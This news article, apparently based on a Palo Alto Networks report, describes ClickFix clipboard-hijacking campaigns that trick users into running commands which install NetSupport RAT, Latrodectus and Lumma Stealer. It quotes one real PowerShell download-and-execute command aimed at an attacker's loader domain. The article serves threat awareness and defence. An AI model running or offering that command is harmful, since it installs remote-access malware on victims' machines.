Hackers are Using ClickFix Techniques to Deliver NetSupport RAT, Latrodectus and Lumma Stealer Malware

Emerging in late 2024 and surging throughout the first half of 2025, ClickFix has become a pervasive social-engineering vector in which threat actors trick users into executing malicious commands under the guise of “quick fixes” for common computer issues.

Rather than relying on exploit kits or malicious attachments, attackers employ clipboard hijacking—injecting obfuscated commands into the victim’s clipboard—and instructing them to paste and run these commands via Windows shell shortcuts such as Win+R or Win+X.

The simplicity of this tactic allows adversaries to bypass many standard prevention controls and quietly deploy a range of malware families on compromised endpoints.

Palo Alto Networks analysts have identified three prominent campaigns leveraging ClickFix in recent months.

In one campaign, NetSupport RAT is distributed through loader domains masquerading as legitimate services such as DocuSign and Okta.

A carefully crafted landing page instructs victims to open the Run dialog (Win+R) and paste an injected PowerShell command, which subsequently downloads a ZIP archive containing a malicious DLL loader.

This DLL sideloads itself via a legitimate Java executable (jp2launcher.exe), retrieves encrypted payloads (data_3.bin and data_4.bin) using curl.exe, and ultimately launches NetSupport RAT’s client32.exe in memory.

In another series of attacks, threat actors deploying Latrodectus combine ClickFix lures with ClearFake infrastructure. Victims visiting compromised websites are redirected to fake verification pages that inject an encoded PowerShell command into the clipboard.

When executed, the command uses curl.exe to fetch a JavaScript downloader that retrieves an MSI installer, which sideloads Latrodectus as a malicious DLL (libcef.dll) within a legitimate process.

The final DLL injects shellcode to harvest browser credentials and exfiltrate data to a remote server.

A third wave of intrusions routes victims through typosquatted IP-logging domains to deliver Lumma Stealer.

As Palo Alto Networks researchers noted, each victim receives a unique MSHTA command that downloads a heavily obfuscated, Base64-encoded PowerShell script.

This script drops and executes an AutoIt-based loader (PartyContinued.exe), which unpacks a CAB archive (Boat.pst) and constructs an AutoIt3 engine binary (Slovenia.com) to launch the Lumma payload.

The loader then executes a series of command-line operations (cmd /c md, copy /b, choice) to extract, assemble, and run the stealer without further user interaction.

Infection Mechanism via Clipboard Hijacking

At the heart of the ClickFix vector is pastejacking: JavaScript on a malicious webpage overwrites the user’s clipboard with an obfuscated command string and displays innocuous instructions to “verify” or “fix” an issue.

Upon pasting into the Run dialog or terminal, the victim unwittingly executes a script that downloads and stages additional components.

For example, the injected PowerShell string used in the NetSupport RAT campaign appears as:-

powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "iex(New-Object Net.WebClient).DownloadString('hxxps://diab.live/up/loader.ps1')"

The string is fully hidden from the user’s view by appending benign-looking comments, such as “Cloud Identificator: 2031,” at the end of the script.

Once executed, the script reaches out to the attacker’s C2, retrieves the next-stage loader, and initiates the multi-stage infection chain.

This clipboard-based delivery mechanism effectively circumvents most email- and network-centric defenses, placing greater emphasis on endpoint behavioral monitoring and registry artifact analysis.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now